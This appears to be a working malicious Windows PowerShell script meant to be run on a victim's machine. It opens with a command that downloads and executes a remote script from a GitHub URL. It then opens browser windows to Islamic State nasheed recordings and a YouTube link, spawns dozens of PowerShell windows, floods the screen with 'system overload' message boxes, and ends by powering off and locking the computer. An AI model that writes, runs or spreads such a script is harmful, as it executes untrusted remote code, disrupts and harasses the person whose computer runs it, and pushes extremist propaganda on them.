IEX(IWR https://raw.githubusercontent.com/ErrorLoadingUsername-404/320rk49asrotji4ejtrsltj3o4t34t/main/overloadpart2.ps1 -UseBasicParsing)
Start-Process -FilePath msedge -ArgumentList '--new-window https://ia600503.us.archive.org/20/items/IslamicStateNasheedMediaArchive/005-.mp3';
Start-Process -FilePath msedge -ArgumentList '--new-window https://ia802502.us.archive.org/11/items/i-sacrifice-for-the-caliphate/Abu%20Yassir%20-%20Ummati%20Qad%20laha%20fajrun.mp3';
Start-Process -FilePath msedge -ArgumentList '--new-window https://www.youtube.com/watch?v=8ybW48rKBME';
start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";
start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";
start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";
start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";
start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";
start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";
start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";
start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";
start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";
start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";
start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";start powershell -ArgumentList "netstat -a -o -n";
msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";
msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";
msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";
msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";
msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";
msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";msg /server:127.0.0.1 * /time:30 "system overload";
shutdown /p;
rundll32.exe user32.dll,LockWorkStation
